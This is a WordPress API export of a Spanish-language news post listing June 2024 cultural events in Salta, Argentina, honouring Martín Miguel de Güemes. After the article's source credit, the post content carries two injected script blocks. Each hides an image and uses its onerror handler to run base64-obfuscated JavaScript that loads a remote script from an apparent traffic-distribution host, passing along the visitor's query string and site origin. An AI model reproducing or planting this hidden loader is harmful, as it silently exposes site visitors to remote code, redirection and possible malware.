{"id":4086,"date":"2024-06-06T12:58:56","date_gmt":"2024-06-06T15:58:56","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4086"},"modified":"2025-08-13T23:54:50","modified_gmt":"2025-08-14T02:54:50","slug":"homenaje-a-martin-miguel-de-guemes-celebraciones-culturales-en-la-provincia","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4086","title":{"rendered":"Homenaje a Mart\u00edn Miguel de G\u00fcemes: celebraciones culturales en la Provincia"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-92adc4512bd89e5af839515d2a0fac76\" style=\"background-color:#670344\"><em>Durante todo este mes, se llevar\u00e1n a cabo diversas actividades culturales que incluir\u00e1n desfiles, conciertos, exposiciones y charlas hist\u00f3ricas, destinadas a honrar su legado y recordar su invaluable aporte a la historia nacional.<\/em><\/h4>\n\n\n\n<p>Espect\u00e1culos de Danza, M\u00fasica, exposiciones alusivas y actividades art\u00edsticas para todo p\u00fablico son algunas de las actividades que podr\u00e1s disfrutar durante todo el mes de junio en diferentes espacios culturales de la Provincia.<\/p>\n\n\n\n<p>Se conmemorar\u00e1 la vida y obra del h\u00e9roe nacional General Mart\u00edn Miguel de G\u00fcemes en Salta. A trav\u00e9s de diversas actividades culturales por el Paso a la Inmortalidad de Mart\u00edn Miguel de G\u00fcemes, ocurrido el 17 de junio de 1821, la&nbsp;<strong>Secretar\u00eda de Cultura&nbsp;<\/strong>honra su memoria por su papel crucial en las Guerras de la Independencia Argentina.<\/p>\n\n\n\n<p>G\u00fcemes es una figura central en la historia de Salta y del noroeste argentino. Su liderazgo al frente de la Gobernaci\u00f3n de Salta, en la resistencia contra las invasiones realistas y su capacidad para organizar a los gauchos en una eficaz fuerza de combate son recordados y celebrados en todo el pa\u00eds.<\/p>\n\n\n\n<p>Durante este mes, Salta organiza diversas actividades para honrar su legado, transmitir a las nuevas generaciones sobre su historia y promover las actividades culturales y tradicionalistas. Estas actividades incluyen presentaciones art\u00edsticas, talleres educativos, proyecciones de documentales, y eventos c\u00edvicos y culturales.<\/p>\n\n\n\n<p><strong>7 de Junio<\/strong><\/p>\n\n\n\n<p>En el marco del proyecto \u00abLa importancia del rol de la mujer en la Gesta Patria\u00bb del Municipio de Campo Quijano, se invit\u00f3 al Programa de Conservaci\u00f3n y Restauraci\u00f3n de la provincia de Salta, a dar una charla sobre la intervenci\u00f3n realizada en el \u00abMant\u00f3n de Macacha G\u00fcemes\u201d. La misma se realizar\u00e1 el d\u00eda viernes &nbsp;7 de 10 a 12 hs con entrada libre y gratuita en la Casa de la Cultura de Campo Quijano. &nbsp;El d\u00eda 7 de junio se conmemora la muerte de Macacha G\u00fcemes, la actividad tiene por objetivo concientizar a la comunidad de la importancia de la Preservaci\u00f3n del Patrimonio, como as\u00ed tambi\u00e9n difundir el rol de la mujer en la Gesta Patria.<\/p>\n\n\n\n<p><strong>7, 14 y 28 de Junio<\/strong><\/p>\n\n\n\n<p>Se lleva a cabo el taller de dibujo \u201cDibujando a G\u00fcemes\u201d para alumnos de 4\u00ba grado. Las escuelas interesadas recibir\u00e1n la visita del reconocido artista Lippe Mendoza en el aula, para realizar el taller de dibujo gracias a la utilizaci\u00f3n de cartillas que ser\u00e1n entregadas en forma gratuita. Actividades para instituciones educativas del turno tarde, con costo e inscripci\u00f3n a trav\u00e9s de escuelas@guemes.gob.ar<\/p>\n\n\n\n<p><strong>Del 10 al 30 de junio<\/strong><\/p>\n\n\n\n<p>En Avda. Belgrano 1002, en los espacios que comprenden el Complejo de Bibliotecas y Archivo de la Provincia se realizar\u00e1 una muestra de Archivos G\u00fcemesianos en los que se podr\u00e1 identificar la relevancia de Mart\u00edn Miguel de G\u00fcemes; como as\u00ed tambi\u00e9n visitas guiadas para grupos escolares y p\u00fablico en general, destacando la importancia de los documentos exhibidos.<\/p>\n\n\n\n<p>Los ejes sobre los que gira la muestra de Archivos y exposici\u00f3n de Libros son la vida y obra del General Mart\u00edn Miguel de G\u00fcemes, su papel en la Independencia Argentina e impacto en la historia. Asimismo, se invitar\u00e1 a historiadores y autores salte\u00f1os a dar charlas sobre el General Mart\u00edn Miguel de G\u00fcemes y su relevancia hist\u00f3rica para el pa\u00eds y Latinoam\u00e9rica en la Sala Adet.<\/p>\n\n\n\n<p><strong>Del 13 al 30 de junio<\/strong><\/p>\n\n\n\n<p>En el Centro Cultural Am\u00e9rica se llevar\u00e1 a cabo la exposici\u00f3n del cuadro del General Mart\u00edn Miguel de G\u00fcemes realizado por Guillermo Usandivaras junto a la r\u00e9plica del Sable del General Mart\u00edn Miguel de G\u00fcemes. La muestra estar\u00e1 disponible del 13 al 30 de junio de 9 a 21 hs en la Sala Manuela Gorriti. La muestra estar\u00e1 destinada al p\u00fablico en general con entrada libre y gratuita.<\/p>\n\n\n\n<p><strong>Del 14 al 21 de junio<\/strong><\/p>\n\n\n\n<p>El Complejo Cultural San Francisco a trav\u00e9s de la Biblioteca conventual \u201cTito Colalunga\u201d, expondr\u00e1 diferentes publicaciones que posee sobre el Gral. G\u00fcemes asociadas a la Gesta Patri\u00f3tica del Ej\u00e9rcito del Norte. &nbsp;Los horarios en los que estar\u00e1n disponibles ser\u00e1n de 11 a 14 y 16 a 19 hs. Actividad sin costo y para el p\u00fablico en general.<\/p>\n\n\n\n<p>Asimismo, en la recepci\u00f3n del Museo en C\u00f3rdoba N\u00ba 33 se realizar\u00e1 el mapping show de luces y guiado el 14 de junio a las 19 hs y un guiado especial nocturno centrado la vida del General Mart\u00edn Miguel de G\u00fcemes y la historia del pueblo salte\u00f1o junto con los frailes franciscanos. Actividad con costo.<\/p>\n\n\n\n<p><strong>15 de Junio<\/strong><\/p>\n\n\n\n<p>A las 19 hs, el Museo de Arte Contempor\u00e1neo articular\u00e1 con la Fundaci\u00f3n Musicarte la propuesta \u201cMultisentidos. Homenaje a Mart\u00edn Miguel de G\u00fcemes\u201d. La presentaci\u00f3n comprende un repertorio especialmente seleccionado que se vincula con diversos momentos de la vida y obra de G\u00fcemes. La actividad contar\u00e1 con la intervenci\u00f3n art\u00edstica de la int\u00e9rprete de danza contempor\u00e1nea Florencia Mangione y la elaboraci\u00f3n en vivo de una pintura a cargo del artista Hebert Artaza. Actividad con entrada libre y gratuita. Para m\u00e1s informaci\u00f3n consultar al 3874954295.<\/p>\n\n\n\n<p>El Complejo Cultural San Francisco en C\u00f3rdoba 14 formar\u00e1 parte de las actividades culturales en homenaje al General. En C\u00f3rdoba esquina caseros se presentar\u00e1 en Concierto el Coro Vida Universitaria de la UCASAL a las 21 hs con entrada libre y gratuita. Se presentar\u00e1n dos coros y solistas con un repertorio de aproximadamente 120 minutos. Se iniciar\u00e1 de esta manera la semana en honor al H\u00e9roe Gaucho y al General Manuel Belgrano.<\/p>\n\n\n\n<p><strong>16 de Junio<\/strong><\/p>\n\n\n\n<p>A las 11 hs en el Museo se llevar\u00e1 a cabo la presentaci\u00f3n de la Banda Militar \u201cLos Infernales de G\u00fcemes\u201d. En la v\u00edspera del paso a la Inmortalidad del Gral. Mart\u00edn Miguel de G\u00fcemes, el Museo G\u00fcemes abrir\u00e1 sus puertas con el Himno al H\u00e9roe Gaucho interpretado por la Banda Militar \u00abLos Infernales de G\u00fcemes\u00bb, luego continuar\u00e1 con un repertorio alusivo a la conmemoraci\u00f3n. Actividad sin Cargo.<\/p>\n\n\n\n<p><strong>17 de Junio<\/strong><\/p>\n\n\n\n<p>Ingreso sin cargo en el aniversario del Paso a la Inmortalidad del General Mart\u00edn Miguel de G\u00fcemes para todos los salte\u00f1os, residentes y argentinos. En esta ocasi\u00f3n, la gratuidad corresponde al objetivo de difundir el invaluable aporte realizado por Mart\u00edn Miguel en la causa independentista y, de este modo, darles la oportunidad a todos los p\u00fablicos a recorrer uno de los museos m\u00e1s emblem\u00e1ticos del pa\u00eds.<\/p>\n\n\n\n<p>Durante la jornada, se realizar\u00e1n gu\u00edas interactivas \u201cUn paseo por el Museo\u201d destinada a ni\u00f1os para disfrutar de la posibilidad de recorrer la muestra desde un lugar l\u00fadico y recreativo desde las 11 a las 19 hs.<\/p>\n\n\n\n<p>A partir de las 16 hs y a las 18 hs, se realizar\u00e1 la Proyecci\u00f3n \u201cG\u00fcemes el sue\u00f1o de una Am\u00e9rica libre\u201d en el Museo G\u00fcemes. La propuesta audiovisual acerca la vida del h\u00e9roe a trav\u00e9s de un documental en formato de serie de cuatro cap\u00edtulos, realizado por Emmanuel Moscoso y Javier Flores, en sus salas del Sal\u00f3n Auditorio.<\/p>\n\n\n\n<p>La miniserie cont\u00f3 con el apoyo de la Secretar\u00eda de Cultura del Gobierno de Salta, la Municipalidad de Salta, del V Regimiento de Caballer\u00eda, Museos y otras instituciones ligadas al h\u00e9roe gaucho. Actividad con entrada libre y gratuita.<\/p>\n\n\n\n<p>En el Museo de Bellas Artes \u201cLola Mora\u201d &nbsp;estar\u00e1 disponible en la planta alta con actividades para las infancias en la sala del retrato oficial de G\u00fcemes con entrada libre y gratuita para todo p\u00fablico. &nbsp;La muestra comprender\u00e1 el conjunto de obras que hacen alusi\u00f3n a la \u201cSalta de antes\u201d: Penutti y la vista de sala, El retrato oficial de G\u00fcemes, el retrato de Carmen su mujer y su t\u00eda. Se realizar\u00e1n tambi\u00e9n puestas en escena para que los ni\u00f1os piensen el contexto de la guerra de la independencia.<\/p>\n\n\n\n<p><strong>19 de Junio<\/strong><\/p>\n\n\n\n<p>&nbsp;El mi\u00e9rcoles 19 de junio en el SUM de la Usina Cultural tendr\u00e1n lugar las funciones del Grupo Leomar \u201cG\u00fcemes H\u00e9roe Gaucho\u201d. La presentaci\u00f3n se realizar\u00e1 a las 9, 11, 14 y 16 hs ante ni\u00f1os y ni\u00f1as de escuelas primarias de Salta.<\/p>\n\n\n\n<p>La obra comprende un espect\u00e1culo l\u00fadico educativo, realizado con t\u00edteres. Narra la vida del Gral. G\u00fcemes, desde su nacimiento hasta su muerte. Entrelaza, lo did\u00e1ctico con lo interactivo, mostrando los hitos m\u00e1s importantes de su vida. El espect\u00e1culo est\u00e1 destinado especialmente para ni\u00f1os de 6 a 9 a\u00f1os. Actividad con entrada libre y gratuita.<\/p>\n\n\n\n<p>Durante el mi\u00e9rcoles, en la Biblioteca y Museo Hist\u00f3ricos R C EXPL M5 \u00abGeneral &nbsp;G\u00fcemes\u00bb en Avenida Arenales 1519 se brindar\u00e1 la conferencia del Lic. Gabriel Popolizio a las 18 hs, con entrada libre y gratuita. La disertaci\u00f3n se realizar\u00e1 sobre los uniformes utilizados por el Ej\u00e9rcito de Observaci\u00f3n sobre el Alto Per\u00fa.<\/p>\n\n\n\n<p>Durante todo el mes de junio, el Museo G\u00fcemes pone a disposici\u00f3n de la comunidad educativa diversas propuestas para docentes y alumnos, ya sea en forma presencial o virtual. A tal fin, en el mes de abril se subir\u00e1n nuevos contenidos a la p\u00e1gina \u201cMi Escuela\u201d a trav\u00e9s de Museos Conectados y se recibir\u00e1n reservas para grupos de hasta 35 alumnos para realizar la visita donde los ni\u00f1os conocer\u00e1n la historia de Mart\u00edn Miguel de G\u00fcemes a trav\u00e9s del juego y la participaci\u00f3n. Para reservas comunicarse a trav\u00e9s del correo electr\u00f3nico escuelas@museoguemes.gob.ar o al 3874954295.<\/p>\n\n\n\n<p>Asimismo, la muestra \u201cG\u00fcemes Itinerante\u201d visitar\u00e1 Rosario de Lerma con el fin de acercar una propuesta \u00fanica. Durante tres semanas una matr\u00edcula de m\u00e1s de 9,000 alumnos tendr\u00e1 la posibilidad de conocer la muestra itinerante y la invaluable historia detr\u00e1s del Gral. G\u00fcemes. Adem\u00e1s, se trabajar\u00e1 articuladamente con el Municipio y 50 practicantes del Profesorado de Educaci\u00f3n Primaria con Modalidad de Rosario de Lerma para la conducci\u00f3n de visitas guiadas con el fin de que los alumnos puedan realizar pr\u00e1cticas profesionales gracias a esta experiencia. Para m\u00e1s informaci\u00f3n o reservas, comunicarse a trav\u00e9s del correo itinerante@museoguemes.gob.ar.<br>&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/homenaje-a-martin-miguel-de-guemes-celebraciones-culturales-en-la-provincia-95956\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Durante todo este mes, se llevar\u00e1n a cabo diversas actividades culturales que incluir\u00e1n desfiles, conciertos, exposiciones y charlas hist\u00f3ricas, destinadas a honrar su legado y recordar su invaluable aporte a la historia nacional. Espect\u00e1culos de Danza, M\u00fasica, exposiciones alusivas y actividades art\u00edsticas para todo p\u00fablico son algunas de las actividades que podr\u00e1s disfrutar durante todo [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4087,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-4086","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4086"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4086"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4086\/revisions"}],"predecessor-version":[{"id":6770,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4086\/revisions\/6770"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4087"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4086"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4086"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4086"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}